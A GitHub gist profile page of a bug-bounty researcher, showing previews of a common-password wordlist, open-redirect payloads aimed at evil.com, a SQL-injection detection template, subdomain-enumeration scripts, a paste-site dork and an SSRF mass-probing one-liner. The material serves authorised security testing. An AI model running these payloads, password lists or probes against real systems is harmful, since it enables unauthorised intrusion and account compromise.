Skip to content

Instantly share code, notes, and snippets.

View KathanP19's full-sized avatar
🎯
Focusing

Kathan Patel KathanP19

🎯
Focusing
View GitHub Profile
August1
August123
August20
August20!
August2020
August2020!
August@20
August@2020
Autumn1
Autumn123
@KathanP19
KathanP19 / option_inside_long.sh
Created December 30, 2021 06:05
Template for bash Script with Arguments inside Flags.
#!/bin/bash
function first(){
echo "First Function";
}
function second(){
echo "Second Function";
}
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
Tracker
__gaTracker
_csrf_token
_ga
a
accept_latest_tos_url
access_level
active
admin
adrevenue
@KathanP19
KathanP19 / Open-Redirect-Payloads.txt
Last active April 15, 2024 18:41
Open Redirect Payloads from zseano methodology.
\/evil.com
%5c%2fevil.com
\/\/evil.com
%5c%2f%5c%2fevil.com
\\evil.com
%5c%5cevil.com
//evil.com
%2f%2fevil.com
//[email protected]
/\/evil.com
@KathanP19
KathanP19 / sqli2.yaml
Created January 2, 2021 02:30 — forked from 0x240x23elu/sqli2.yaml
Basic SQL Injection Detections nuclei Template
id: SQLInjection_ERROR
info:
name: SQLINJECTION Detection
author: 0x240x23elu & OFJAAAH
severity: High
requests:
- method: GET
@KathanP19
KathanP19 / sub.sh
Last active April 15, 2024 18:43
simple bash script
#!/bin/bash
echo -e "\e[32mRunning Findomain on $1 \e[0m";
findomain -t $1 -u domain_$1.txt
echo -e "\e[32m Running assetfinder on $1 \e[0m";
assetfinder --subs-only $1 >> domain_$1.txt
echo -e "\e[32mRunning Subfinder on $1 \e[0m";
subfinder -d $1 -silent >> domain_$1.txt
#!/bin/bash
RED=$(tput setaf 1)
GREEN=$(tput setaf 2)
BLUE=$(tput setaf 4)
RESET=$(tput sgr0)
AMASS_VERSION=3.8.2
@KathanP19
KathanP19 / googledork1
Created November 25, 2020 03:19 — forked from TvMpt/googledork1
"example.com" site:bitpaste.app | site:codebeautify.org | site:codepad.org | site:codepen.io | site:codeshare.io | site:dartpad.dartlang.org | site:dotnetfiddle.net | site:dpaste.com | site:dpaste.org | site:dumpz.org | site:gitlab.com | site:hastebin.com | site:heypasteit.com | site:ide.codingblocks.com | site:ide.geeksforgeeks.org | site:ideone.com | site:jsbin.com | site:jsfiddle.net | site:jsitor.com | site:justpaste.it | site:paste.debian.net | site:paste.fedoraproject.org | site:paste.frubar.net | site:paste.lisp.org | site:paste.opensuse.org | site:paste.org | site:paste.org.ru | site:paste.pound-python.org | site:paste.ubuntu.com | site:paste.xinu.at | site:paste2.org | site:pastebin.com | site:pastebin.fr | site:pastehtml.com | site:phpfiddle.org | site:play.golang.org | site:repl.it | site:rextester.com | site:slexy.org | site:snipplr.com | site:snipt.net | site:stackoverflow.com | site:textsnip.com | site:trello.com | site:trello.com | site:try.ceylon-lang.org
@KathanP19
KathanP19 / Ssrf
Created November 24, 2020 15:24 — forked from pikpikcu/Ssrf
curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain/*&output=txt&fl=original&collapse=urlkey&page=/" | gf ssrf | qsreplace "https://localtest.me" | parallel -j50 -q curl -i -s -k -o >(grep -io "<title>[^<]*" | cut -d'>' -f2-) --silent --max-time 2 --write-out 'Status:%{http_code}\t Header-size:%{size_header}tUrl:%{url_effective} || '